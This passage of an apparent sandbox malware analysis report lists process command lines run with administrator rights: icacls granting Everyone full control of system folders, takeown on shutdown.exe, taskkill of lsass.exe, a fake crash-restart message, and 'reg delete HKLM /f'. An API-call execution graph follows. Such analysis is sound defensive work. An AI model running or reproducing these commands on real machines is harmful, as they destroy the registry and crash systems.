File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:15:37:28
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\drivers /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:15:37:29
Start date:29/10/2024
Path:C:\Windows\System32\takeown.exe
Wow64 process (32bit):false
Commandline:takeown /f C:\Windows\System32\shutdown.exe /r /d y
Imagebase:0x7ff6018f0000
File size:66'560 bytes
MD5 hash:D258A76AA885CBBCAE8C720CD1C284A5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:28
Start time:15:37:29
Start date:29/10/2024
Path:C:\Windows\System32\icacls.exe
Wow64 process (32bit):false
Commandline:icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
Imagebase:0x7ff64de10000
File size:39'424 bytes
MD5 hash:48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:15:37:29
Start date:29/10/2024
Path:C:\Windows\System32\taskkill.exe
Wow64 process (32bit):false
Commandline:taskkill /f /im lsass.exe
Imagebase:0x7ff754c90000
File size:101'376 bytes
MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:15:37:30
Start date:29/10/2024
Path:C:\Windows\System32\wlrmdr.exe
Wow64 process (32bit):false
Commandline:-s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
Imagebase:0x7ff785070000
File size:68'184 bytes
MD5 hash:EF9BBA7A637A11B224A90BF90A8943AC
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:15:37:30
Start date:29/10/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:reg delete HKLM /f
Imagebase:0x7ff66df70000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Reset < >

    Execution Graph

    Execution Coverage:13.3%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:2.5%
    Total number of Nodes:2000
    Total number of Limit Nodes:27
    execution_graph 8003 14000e3f0 8004 14000e4ee 8003->8004 8005 14000e40a 8003->8005 8005->8004 8006 14000e483 8005->8006 8007 14000e41a 8005->8007 8020 14000e770 WideCharToMultiByte 8006->8020 8008 14000e451 8007->8008 8009 14000e425 8007->8009 8008->8008 8011 14000e45d WriteFile 8008->8011 8013 14000e620 5 API calls 8009->8013 8017 14000e445 8013->8017 8014 14000e4c5 WriteFile 8016 14000e4dc HeapFree 8014->8016 8015 14000e4b7 8024 14000e620 8015->8024 8016->8004 8019 14000e4bf 8019->8016 8021 14000e7b9 RtlAllocateHeap 8020->8021 8022 14000e4a0 8020->8022 8021->8022 8023 14000e7d8 WideCharToMultiByte 8021->8023 8022->8004 8022->8014 8022->8015 8023->8022 8025 14000e644 8024->8025 8026 14000e75e 8024->8026 8027 14000e673 8025->8027 8028 14000e64a SetFilePointer 8025->8028 8026->8019 8029 14000e6ff 8027->8029 8030 14000e67e 8027->8030 8028->8027 8037 14000ddc0 8029->8037 8032 14000e6b7 8030->8032 8034 14000e699 memcpy 8030->8034 8032->8019 8033 14000e707 8035 14000e711 WriteFile 8033->8035 8036 14000e739 memcpy 8033->8036 8034->8019 8035->8019 8036->8019 8038 14000de04 8037->8038 8039 14000ddd4 WriteFile 8037->8039 8038->8033 8039->8033 7999 140010ffc 8000 140011009 7999->8000 8001 14001101f 7999->8001 8000->8001 8002 140011013 TlsFree 8000->8002 8002->8001 8040 140001000 8041 14000101d 8040->8041 8088 140012060 HeapCreate TlsAlloc 8041->8088 8043 14000105b 8091 14000de20 8043->8091 8045 140001065 8094 14000c980 HeapCreate 8045->8094 8047 140001074 8095 14000b538 memset 00007FFEEC975550 CoInitialize 8047->8095 8049 14000107e 8096 1400120d0 8049->8096 8051 1400010a3 8103 14000ccd8 8051->8103 8058 14000d524 16 API calls 8059 14000112a 8058->8059 8060 14000d444 11 API calls 8059->8060 8061 14000114e 8060->8061 8128 140011d30 8061->8128 8063 140001185 8064 1400120d0 3 API calls 8063->8064 8065 1400011a6 8064->8065 8066 14000d524 16 API calls 8065->8066 8067 1400011b2 8066->8067 8068 14000d444 11 API calls 8067->8068 8069 1400011d6 8068->8069 8134 14000c4d0 8069->8134 8073 1400011ef 8141 1400121c0 GetLastError TlsGetValue SetLastError 8073->8141 8075 1400011ff 8142 140004211 8075->8142 8079 14000121f 8165 1400021ea 8079->8165 8082 140001236 8272 14000593c 8082->8272 8623 140012c50 RtlAllocateHeap RtlAllocateHeap TlsSetValue 8088->8623 8090 14001208c 8090->8043 8624 140011370 RtlAllocateHeap RtlAllocateHeap RtlInitializeCriticalSection 8091->8624 8093 14000de38 8093->8045 8094->8047 8095->8049 8097 1400120f3 8096->8097 8098 140012178 8096->8098 8100 140012133 RtlReAllocateHeap 8097->8100 8101 14001210d RtlAllocateHeap 8097->8101 8099 140012183 HeapFree 8098->8099 8102 14001215f 8098->8102 8099->8102 8100->8102 8101->8102 8102->8051 8625 14000ce30 8103->8625 8106 14000cd23 RtlAllocateHeap 8108 14000cdcc HeapFree 8106->8108 8109 14000cd51 8106->8109 8107 1400010e6 8112 14000d524 8107->8112 8108->8107 8634 1400117fc 8109->8634 8113 1400010fa 8112->8113 8114 14000d52d 8112->8114 8123 14000d444 RtlAllocateHeap 8113->8123 8700 14000d60c 8114->8700 8117 140011968 9 API calls 8118 14000d548 8117->8118 8119 14000d562 HeapFree 8118->8119 8120 14000d57c 8118->8120 8119->8119 8119->8120 8121 14000d582 HeapFree 8120->8121 8122 14000d595 HeapFree 8120->8122 8121->8122 8122->8113 8124 14000d484 RtlAllocateHeap 8123->8124 8125 14000d4a0 8123->8125 8124->8125 8126 1400117fc 9 API calls 8125->8126 8127 14000111e 8126->8127 8127->8058 8707 140011ef4 8128->8707 8131 140011dc6 8131->8063 8132 140011d6e RtlAllocateHeap 8132->8131 8133 140011d90 memset 8132->8133 8133->8131 8135 14000c890 8134->8135 8136 14000c8a5 RtlRemoveVectoredExceptionHandler 8135->8136 8137 14000c8b6 8135->8137 8136->8137 8138 14000c8bb RtlAddVectoredExceptionHandler 8137->8138 8139 1400011e5 8137->8139 8138->8139 8140 1400121c0 GetLastError TlsGetValue SetLastError 8139->8140 8140->8073 8141->8075 8712 1400123e0 8142->8712 8144 140004222 8723 1400121c0 GetLastError TlsGetValue SetLastError 8144->8723 8146 1400042a4 8724 1400121c0 GetLastError TlsGetValue SetLastError 8146->8724 8148 1400042b8 8725 1400121c0 GetLastError TlsGetValue SetLastError 8148->8725 8150 1400042c8 8726 1400121c0 GetLastError TlsGetValue SetLastError 8150->8726 8152 1400042d8 8727 140010d90 8152->8727 8156 14000430a 8731 140007dc0 8156->8731 8160 14000120e 8161 140012210 TlsGetValue 8160->8161 8162 140012251 RtlAllocateHeap 8161->8162 8163 140012276 RtlReAllocateHeap 8161->8163 8164 1400122a1 8162->8164 8163->8164 8164->8079 8166 1400123e0 21 API calls 8165->8166 8167 1400021ff 8166->8167 8769 1400121c0 GetLastError TlsGetValue SetLastError 8167->8769 8169 140002209 8770 1400121c0 GetLastError TlsGetValue SetLastError 8169->8770 8171 140002227 8771 1400121c0 GetLastError TlsGetValue SetLastError 8171->8771 8173 14000223b 8772 14000c0c4 8173->8772 8177 140002255 8178 140002646 8177->8178 8181 14000239c 8177->8181 8199 1400121c0 GetLastError TlsGetValue SetLastError 8177->8199 8204 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8177->8204 8206 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8177->8206 8179 140012360 HeapFree 8178->8179 8180 140002666 8179->8180 8182 140012360 HeapFree 8180->8182 8183 14000d60c 4 API calls 8181->8183 8184 140002678 8182->8184 8185 1400023a8 8183->8185 8186 140012360 HeapFree 8184->8186 8779 1400121c0 GetLastError TlsGetValue SetLastError 8185->8779 8188 14000268a 8186->8188 8190 140012360 HeapFree 8188->8190 8189 1400023b2 8780 1400121c0 GetLastError TlsGetValue SetLastError 8189->8780 8192 14000269c 8190->8192 8193 140012360 HeapFree 8192->8193 8195 140001224 8193->8195 8194 1400023c6 8781 1400121c0 GetLastError TlsGetValue SetLastError 8194->8781 8195->8082 8502 14000433f 8195->8502 8197 1400023d6 8782 1400121c0 GetLastError TlsGetValue SetLastError 8197->8782 8199->8177 8200 1400023e6 8783 1400121c0 GetLastError TlsGetValue SetLastError 8200->8783 8202 1400023fb 8784 1400121c0 GetLastError TlsGetValue SetLastError 8202->8784 8204->8177 8205 14000240f 8785 140007ce0 8205->8785 8206->8177 8210 140002431 8794 140010ba0 8210->8794 8214 140002450 8215 140007dc0 6 API calls 8214->8215 8216 140002463 8215->8216 8217 140012210 3 API calls 8216->8217 8218 140002472 8217->8218 8803 1400121c0 GetLastError TlsGetValue SetLastError 8218->8803 8220 140002481 8804 140012450 8220->8804 8222 140002490 8223 140012210 3 API calls 8222->8223 8224 14000249f 8223->8224 8809 1400121c0 GetLastError TlsGetValue SetLastError 8224->8809 8226 1400024a9 8810 1400121c0 GetLastError TlsGetValue SetLastError 8226->8810 8228 1400024bd 8811 1400121c0 GetLastError TlsGetValue SetLastError 8228->8811 8230 1400024cd 8812 1400121c0 GetLastError TlsGetValue SetLastError 8230->8812 8232 1400024dd 8233 140010ba0 6 API calls 8232->8233 8234 1400024f9 8233->8234 8813 1400125d0 TlsGetValue 8234->8813 8236 140002503 8237 140007dc0 6 API calls 8236->8237 8238 140002516 8237->8238 8239 140012210 3 API calls 8238->8239 8240 140002525 8239->8240 8814 1400121c0 GetLastError TlsGetValue SetLastError 8240->8814 8242 14000252f 8815 1400121c0 GetLastError TlsGetValue SetLastError 8242->8815 8244 140002543 8816 140007e50 8244->8816 8246 14000255f 8247 140012210 3 API calls 8246->8247 8248 14000256e 8247->8248 8824 1400124c0 8248->8824 8273 140005945 8272->8273 8273->8273 8274 1400123e0 21 API calls 8273->8274 8286 14000595f 8274->8286 8275 1400121c0 GetLastError TlsGetValue SetLastError 8282 140005a39 8275->8282 8276 140007c90 3 API calls 8276->8286 8277 1400121c0 GetLastError TlsGetValue SetLastError 8281 140005bed 8277->8281 8278 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8278->8286 8279 140007c90 3 API calls 8279->8282 8280 1400121c0 GetLastError TlsGetValue SetLastError 8287 140005b13 8280->8287 8281->8277 8288 140005cc7 8281->8288 8290 140007c90 3 API calls 8281->8290 8308 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8281->8308 8315 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8281->8315 8282->8275 8282->8279 8283 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8282->8283 8282->8287 8292 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8282->8292 8283->8282 8284 140007c90 3 API calls 8284->8287 8285 1400121c0 GetLastError TlsGetValue SetLastError 8285->8286 8286->8276 8286->8278 8286->8282 8286->8285 8291 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8286->8291 8287->8280 8287->8281 8287->8284 8295 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8287->8295 8307 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8287->8307 8300 1400121c0 GetLastError TlsGetValue SetLastError 8288->8300 8309 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8288->8309 8317 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8288->8317 8323 140005da1 8288->8323 8845 140007c90 8288->8845 8289 140005e7f 8294 1400121c0 GetLastError TlsGetValue SetLastError 8289->8294 8302 140007c90 3 API calls 8289->8302 8321 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8289->8321 8324 140005f5d 8289->8324 8326 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8289->8326 8290->8281 8291->8286 8292->8282 8294->8289 8295->8287 8296 140007c90 3 API calls 8296->8323 8297 1400121c0 GetLastError TlsGetValue SetLastError 8297->8324 8298 140006119 8848 1400121c0 GetLastError TlsGetValue SetLastError 8298->8848 8300->8288 8301 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8301->8323 8302->8289 8303 1400121c0 GetLastError TlsGetValue SetLastError 8332 14000603b 8303->8332 8304 14000612a 8306 140012450 4 API calls 8304->8306 8305 140007c90 3 API calls 8305->8324 8311 140006139 8306->8311 8307->8287 8308->8281 8309->8288 8310 1400121c0 GetLastError TlsGetValue SetLastError 8310->8323 8314 140012450 4 API calls 8311->8314 8312 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8312->8324 8313 140007c90 3 API calls 8313->8332 8316 14000614b 8314->8316 8315->8281 8319 140012210 3 API calls 8316->8319 8317->8288 8318 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8318->8323 8320 14000615c 8319->8320 8849 1400121c0 GetLastError TlsGetValue SetLastError 8320->8849 8321->8289 8323->8289 8323->8296 8323->8301 8323->8310 8323->8318 8324->8297 8324->8305 8324->8312 8327 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8324->8327 8324->8332 8325 140006166 8850 1400121c0 GetLastError TlsGetValue SetLastError 8325->8850 8326->8289 8327->8324 8328 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 8328->8332 8330 140006176 8851 1400047e2 8330->8851 8332->8298 8332->8303 8332->8313 8332->8328 8334 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8332->8334 8334->8332 8335 140012210 3 API calls 8336 14000619e 8335->8336 8337 14000c2bc 16 API calls 8336->8337 8338 1400061a3 GetModuleHandleW 8337->8338 8878 1400121c0 GetLastError TlsGetValue SetLastError 8338->8878 8340 1400061c4 8879 1400121c0 GetLastError TlsGetValue SetLastError 8340->8879 8342 1400061d8 8880 1400121c0 GetLastError TlsGetValue SetLastError 8342->8880 8344 1400061e8 8881 1400121c0 GetLastError TlsGetValue SetLastError 8344->8881 8346 1400061f8 8347 140010ba0 6 API calls 8346->8347 8348 140006216 8347->8348 8882 1400125d0 TlsGetValue 8348->8882 8350 140006220 8351 140007dc0 6 API calls 8350->8351 8352 140006233 8351->8352 8353 140012210 3 API calls 8352->8353 8354 140006245 8353->8354 8883 1400121c0 GetLastError TlsGetValue SetLastError 8354->8883 8356 14000624f 8884 1400121c0 GetLastError TlsGetValue SetLastError 8356->8884 8358 140006263 8885 1400121c0 GetLastError TlsGetValue SetLastError 8358->8885 8360 140006273 8886 1400121c0 GetLastError TlsGetValue SetLastError 8360->8886 8362 140006283 8363 140010ba0 6 API calls 8362->8363 8364 1400062a2 8363->8364 8887 1400125d0 TlsGetValue 8364->8887 8366 1400062ac 8367 140007dc0 6 API calls 8366->8367 8368 1400062bf 8367->8368 8369 140012210 3 API calls 8368->8369 8370 1400062d1 8369->8370 8888 140004134 8370->8888 8374 1400062ed 8898 1400121c0 GetLastError TlsGetValue SetLastError 8374->8898 8376 1400062fd 8899 140002c46 8376->8899 8378 140006314 9015 140001e57 8378->9015 8384 140006344 9105 1400121c0 GetLastError TlsGetValue SetLastError 8384->9105 8386 140006354 9106 1400049ea 8386->9106 8389 140012210 3 API calls 8390 1400063a0 PathRemoveBackslashW 8389->8390 8391 1400063b9 8390->8391 9231 1400121c0 GetLastError TlsGetValue SetLastError 8391->9231 8393 1400063c3 9232 1400121c0 GetLastError TlsGetValue SetLastError 8393->9232 8395 1400063d7 9233 1400121c0 GetLastError TlsGetValue SetLastError 8395->9233 8397 1400063e7 9234 140003cc9 8397->9234 8401 140006406 9258 1400125d0 TlsGetValue 8401->9258 8403 140006410 9259 14000c45c 8403->9259 8405 140006424 9262 1400121c0 GetLastError TlsGetValue SetLastError 8405->9262 8407 140006449 8408 140012450 4 API calls 8407->8408 8409 140006458 8408->8409 8410 140012450 4 API calls 8409->8410 8411 14000646c 8410->8411 8412 140012210 3 API calls 8411->8412 8413 14000647d 8412->8413 9263 1400121c0 GetLastError TlsGetValue SetLastError 8413->9263 8415 140006487 9264 1400121c0 GetLastError TlsGetValue SetLastError 8415->9264 8417 140006497 9265 1400026bb 8417->9265 8420 140012210 3 API calls 8421 1400064c0 8420->8421 9311 140004ee2 8421->9311 8425 1400064d6 8426 140012450 4 API calls 8425->8426 8427 1400064e5 8426->8427 8428 140012210 3 API calls 8427->8428 8429 1400064f7 PathQuoteSpacesW 8428->8429 9515 1400121c0 GetLastError TlsGetValue SetLastError 8429->9515 8431 140006516 8432 140012450 4 API calls 8431->8432 8433 140006525 8432->8433 8434 140012450 4 API calls 8433->8434 8435 14000653c 8434->8435 8436 140012450 4 API calls 8435->8436 8437 140006551 8436->8437 8438 140012210 3 API calls 8437->8438 8439 140006563 PathQuoteSpacesW 8438->8439 8440 1400065a1 8439->8440 8441 14000657d 8439->8441 9577 140003ddc 8440->9577 9516 140007284 CreateThread 8441->9516 8444 140006598 9527 1400121c0 GetLastError TlsGetValue SetLastError 8444->9527 8446 1400065b5 9528 1400121c0 GetLastError TlsGetValue SetLastError 8446->9528 8448 1400065ce 8449 140012450 4 API calls 8448->8449 8450 1400065dd 8449->8450 8451 140012450 4 API calls 8450->8451 8452 1400065f4 8451->8452 8453 140012450 4 API calls 8452->8453 8454 140006609 8453->8454 9529 140012520 TlsGetValue 8454->9529 8456 140006612 9530 1400121c0 GetLastError TlsGetValue SetLastError 8456->9530 8458 14000661c 9531 1400121c0 GetLastError TlsGetValue SetLastError 8458->9531 8460 14000662c 9532 14000daa8 8460->9532 8464 140006645 9539 1400121c0 GetLastError TlsGetValue SetLastError 8464->9539 8466 140006657 8467 140012450 4 API calls 8466->8467 8468 140006666 8467->8468 8469 140012450 4 API calls 8468->8469 8470 140006678 8469->8470 9540 1400125d0 TlsGetValue 8470->9540 8472 140006682 9541 1400125d0 TlsGetValue 8472->9541 8474 140006690 9542 1400125d0 TlsGetValue 8474->9542 8476 14000669f 9543 1400029c8 8476->9543 8478 1400066b5 8503 1400123e0 21 API calls 8502->8503 8504 140004351 8503->8504 10458 1400121c0 GetLastError TlsGetValue SetLastError 8504->10458 8506 14000435b 10459 1400121c0 GetLastError TlsGetValue SetLastError 8506->10459 8508 14000436f 10460 1400121c0 GetLastError TlsGetValue SetLastError 8508->10460 8510 14000437f 10461 1400121c0 GetLastError TlsGetValue SetLastError 8510->10461 8512 14000438f 8513 140010ba0 6 API calls 8512->8513 8514 1400043ad 8513->8514 10462 1400125d0 TlsGetValue 8514->10462 8516 1400043b7 8517 140007dc0 6 API calls 8516->8517 8518 1400043ca 8517->8518 8519 140012210 3 API calls 8518->8519 8520 1400043d9 8519->8520 10463 1400121c0 GetLastError TlsGetValue SetLastError 8520->10463 8522 1400043e3 10464 1400121c0 GetLastError TlsGetValue SetLastError 8522->10464 8524 1400043f7 10465 1400121c0 GetLastError TlsGetValue SetLastError 8524->10465 8526 140004407 10466 1400121c0 GetLastError TlsGetValue SetLastError 8526->10466 8528 140004417 8529 140010ba0 6 API calls 8528->8529 8530 140004433 8529->8530 10467 1400125d0 TlsGetValue 8530->10467 8532 14000443d 8533 140007dc0 6 API calls 8532->8533 8534 140004450 8533->8534 8535 140012210 3 API calls 8534->8535 8536 14000445f 8535->8536 8537 140004134 24 API calls 8536->8537 8538 140004469 8537->8538 10468 1400121c0 GetLastError TlsGetValue SetLastError 8538->10468 8540 140004478 10469 1400121c0 GetLastError TlsGetValue SetLastError 8540->10469 8542 140004488 8543 140002c46 110 API calls 8542->8543 8544 14000449c 8543->8544 10470 1400121c0 GetLastError TlsGetValue SetLastError 8544->10470 8546 1400044ba 10471 1400121c0 GetLastError TlsGetValue SetLastError 8546->10471 8548 1400044ce 8549 14000bc94 24 API calls 8548->8549 8550 1400044f2 8549->8550 8551 140012210 3 API calls 8550->8551 8552 140004501 8551->8552 8553 1400124c0 wcscmp 8552->8553 8554 14000450e 8553->8554 8555 140004779 8554->8555 10472 1400121c0 GetLastError TlsGetValue SetLastError 8554->10472 8555->8555 8557 140004521 10473 1400121c0 GetLastError TlsGetValue SetLastError 8557->10473 8559 140004535 10474 1400121c0 GetLastError TlsGetValue SetLastError 8559->10474 8561 140004545 10475 1400121c0 GetLastError TlsGetValue SetLastError 8561->10475 8563 140004555 8564 140010ba0 6 API calls 8563->8564 8565 140004573 8564->8565 10476 1400125d0 TlsGetValue 8565->10476 8567 14000457d 8568 140007dc0 6 API calls 8567->8568 8569 140004590 8568->8569 8570 140012210 3 API calls 8569->8570 8571 14000459f 8570->8571 10477 1400121c0 GetLastError TlsGetValue SetLastError 8571->10477 8573 1400045a9 10478 1400121c0 GetLastError TlsGetValue SetLastError 8573->10478 8575 1400045bd 10479 1400121c0 GetLastError TlsGetValue SetLastError 8575->10479 8577 1400045cd 10480 1400121c0 GetLastError TlsGetValue SetLastError 8577->10480 8579 1400045dd 8580 140010ba0 6 API calls 8579->8580 8581 1400045fb 8580->8581 10481 1400125d0 TlsGetValue 8581->10481 8583 140004605 8584 140007dc0 6 API calls 8583->8584 8585 140004618 8584->8585 8586 140012210 3 API calls 8585->8586 8587 140004627 8586->8587 10482 1400121c0 GetLastError TlsGetValue SetLastError 8587->10482 8589 140004631 10483 1400121c0 GetLastError TlsGetValue SetLastError 8589->10483 8591 140004641 8592 140005794 65 API calls 8591->8592 8593 14000465b 8592->8593 8594 140012210 3 API calls 8593->8594 8595 14000466c 8594->8595 10484 1400121c0 GetLastError TlsGetValue SetLastError 8595->10484 8597 140004676 10485 1400121c0 GetLastError TlsGetValue SetLastError 8597->10485 8599 140004686 8600 140005794 65 API calls 8599->8600 8601 1400046a0 8600->8601 8602 140012210 3 API calls 8601->8602 8603 1400046af PathAddBackslashW 8602->8603 10486 1400121c0 GetLastError TlsGetValue SetLastError 8603->10486 8605 1400046c3 10487 1400121c0 GetLastError TlsGetValue SetLastError 8605->10487 8607 1400046e0 8608 140012450 4 API calls 8607->8608 8609 1400046ef 8608->8609 8610 140012450 4 API calls 8609->8610 8611 140004703 8610->8611 10488 1400125d0 TlsGetValue 8611->10488 8613 14000470d 8614 14000309a 10 API calls 8613->8614 8615 140004720 8614->8615 10489 1400121c0 GetLastError TlsGetValue SetLastError 8615->10489 8617 140004743 8618 140012450 4 API calls 8617->8618 8619 140004752 8618->8619 8620 140012210 3 API calls 8619->8620 8621 140004763 PathRemoveBackslashW 8620->8621 8622 140003ddc 111 API calls 8621->8622 8622->8555 8623->8090 8624->8093 8626 14000cd04 RtlAllocateHeap 8625->8626 8627 14000ce39 8625->8627 8626->8106 8626->8107 8649 14000d140 8627->8649 8629 14000ce4b 8656 140011968 8629->8656 8632 14000ce83 HeapFree 8632->8632 8633 14000ce9d HeapFree 8632->8633 8633->8626 8635 14001182b 8634->8635 8636 140011903 RtlAllocateHeap 8635->8636 8637 14001183b 8635->8637 8638 14000cd9e RtlAllocateHeap 8636->8638 8639 140011920 8636->8639 8693 140011ab8 LoadLibraryW 8637->8693 8638->8107 8639->8638 8641 140011947 RtlInitializeCriticalSection 8639->8641 8641->8638 8643 140011883 RtlAllocateHeap 8645 1400118f4 RtlLeaveCriticalSection 8643->8645 8646 14001189e 8643->8646 8644 140011862 8644->8643 8644->8645 8645->8638 8647 1400117fc 4 API calls 8646->8647 8648 1400118b7 8647->8648 8648->8645 8653 14000d15b 8649->8653 8650 14000d1b4 memset 8651 14000d1d0 8650->8651 8651->8629 8652 14000d163 HeapFree 8652->8653 8653->8650 8653->8652 8669 140016bb0 8653->8669 8674 1400116f4 8653->8674 8657 1400119fc 8656->8657 8658 14001197e RtlEnterCriticalSection 8656->8658 8684 140011668 8657->8684 8659 14001199c 8658->8659 8660 1400119ed RtlLeaveCriticalSection 8658->8660 8662 140011968 4 API calls 8659->8662 8663 14000ce54 HeapFree HeapFree 8660->8663 8667 1400119a9 HeapFree 8662->8667 8663->8632 8663->8633 8665 140011a11 HeapFree 8665->8663 8666 140011a07 RtlDeleteCriticalSection 8666->8665 8667->8660 8673 140016bca 8669->8673 8670 140016ced 8670->8653 8671 140016bb0 HeapFree 8671->8673 8673->8670 8673->8671 8681 140012360 8673->8681 8675 14001170a RtlEnterCriticalSection 8674->8675 8678 140011714 8674->8678 8675->8678 8676 1400117f1 8676->8653 8677 1400117e7 RtlLeaveCriticalSection 8677->8676 8679 140011794 8678->8679 8680 14001177b HeapFree 8678->8680 8679->8676 8679->8677 8680->8679 8682 140012371 HeapFree 8681->8682 8683 140012385 8681->8683 8682->8683 8683->8673 8685 140011685 8684->8685 8686 14001167b RtlEnterCriticalSection 8684->8686 8687 1400116a8 8685->8687 8688 14001168e HeapFree 8685->8688 8686->8685 8689 1400116ca 8687->8689 8690 1400116b0 HeapFree 8687->8690 8688->8687 8688->8688 8691 1400116e8 8689->8691 8692 1400116de RtlLeaveCriticalSection 8689->8692 8690->8689 8690->8690 8691->8665 8691->8666 8692->8691 8694 140011b24 8693->8694 8695 140011aeb GetProcAddress 8693->8695 8698 14001184e RtlEnterCriticalSection 8694->8698 8699 140011b38 Sleep 8694->8699 8696 140011b17 FreeLibrary 8695->8696 8697 140011b00 8695->8697 8696->8694 8696->8698 8697->8696 8698->8644 8699->8694 8701 14000d656 8700->8701 8705 14000d62f 8700->8705 8702 14000d53f 8701->8702 8703 1400116f4 3 API calls 8701->8703 8702->8117 8703->8701 8704 140016bb0 HeapFree 8704->8705 8705->8702 8705->8704 8706 1400116f4 3 API calls 8705->8706 8706->8705 8708 140011d69 8707->8708 8709 140011ef9 8707->8709 8708->8131 8708->8132 8710 140011f38 HeapFree 8709->8710 8711 140016bb0 HeapFree 8709->8711 8710->8708 8711->8709 8713 1400123ed 8712->8713 8714 14001240f TlsGetValue 8712->8714 8716 140012060 5 API calls 8713->8716 8715 140012420 8714->8715 8721 14001240d 8714->8721 8751 140012c50 RtlAllocateHeap RtlAllocateHeap TlsSetValue 8715->8751 8718 1400123f2 TlsGetValue 8716->8718 8742 140016fb4 8718->8742 8719 140012425 TlsGetValue 8722 140016fb4 13 API calls 8719->8722 8721->8144 8722->8721 8723->8146 8724->8148 8725->8150 8726->8152 8752 140010db0 8727->8752 8730 1400125d0 TlsGetValue 8730->8156 8732 140007dde 8731->8732 8766 140012630 TlsGetValue 8732->8766 8735 1400126d0 3 API calls 8736 140007df4 8735->8736 8739 140007e02 8736->8739 8768 140012850 TlsGetValue 8736->8768 8737 14000431d 8741 1400125a0 TlsGetValue 8737->8741 8739->8737 8739->8739 8740 140007e21 CharUpperW 8739->8740 8740->8737 8741->8160 8743 140016fe2 TlsAlloc RtlInitializeCriticalSection 8742->8743 8744 140017001 TlsGetValue 8742->8744 8743->8744 8745 1400170d6 RtlAllocateHeap 8744->8745 8746 140017019 RtlAllocateHeap 8744->8746 8747 1400170ee 8745->8747 8746->8747 8748 140017039 RtlEnterCriticalSection 8746->8748 8747->8721 8749 140017051 7 API calls 8748->8749 8750 14001704e 8748->8750 8749->8745 8750->8749 8751->8719 8754 140010ddc 8752->8754 8756 140010f00 8754->8756 8757 140010f1e 8756->8757 8760 1400126d0 TlsGetValue 8757->8760 8761 1400126f4 8760->8761 8762 140012772 8761->8762 8763 14001272d RtlReAllocateHeap 8761->8763 8764 140004300 8762->8764 8765 140012793 RtlReAllocateHeap 8762->8765 8763->8764 8764->8730 8765->8764 8767 140007de9 8766->8767 8767->8735 8768->8739 8769->8169 8770->8171 8771->8173 8773 1400126d0 3 API calls 8772->8773 8774 14000c0e6 GetModuleFileNameW 8773->8774 8775 14000c10d 8774->8775 8831 140012900 TlsGetValue 8775->8831 8777 14000224b 8778 1400125d0 TlsGetValue 8777->8778 8778->8177 8779->8189 8780->8194 8781->8197 8782->8200 8783->8202 8784->8205 8786 140007d10 8785->8786 8787 140012630 TlsGetValue 8786->8787 8788 140007d22 8787->8788 8789 1400126d0 3 API calls 8788->8789 8790 140007d2d 8789->8790 8791 140002427 8790->8791 8832 140012850 TlsGetValue 8790->8832 8793 1400125d0 TlsGetValue 8791->8793 8793->8210 8796 140010bb0 8794->8796 8795 140010c34 8797 140010f00 3 API calls 8795->8797 8796->8795 8799 140010c04 8796->8799 8798 140002446 8797->8798 8802 1400125d0 TlsGetValue 8798->8802 8833 140017140 8799->8833 8801 140010c0c 8801->8795 8802->8214 8803->8220 8805 140012477 8804->8805 8806 140012469 wcslen 8804->8806 8807 1400126d0 3 API calls 8805->8807 8806->8805 8808 140012485 8807->8808 8808->8222 8809->8226 8810->8228 8811->8230 8812->8232 8813->8236 8814->8242 8815->8244 8817 140007e75 8816->8817 8818 140012630 TlsGetValue 8817->8818 8819 140007e8e 8818->8819 8820 1400126d0 3 API calls 8819->8820 8821 140007e9a 8820->8821 8823 140007eaa 8821->8823 8839 140012850 TlsGetValue 8821->8839 8823->8246 8825 1400124d6 wcscmp 8824->8825 8827 14000257d 8825->8827 8827->8178 8828 14000c2bc 8827->8828 8840 140011044 TlsGetValue 8828->8840 8831->8777 8832->8791 8834 140017166 WideCharToMultiByte 8833->8834 8837 1400171f2 8833->8837 8836 1400171ae malloc 8834->8836 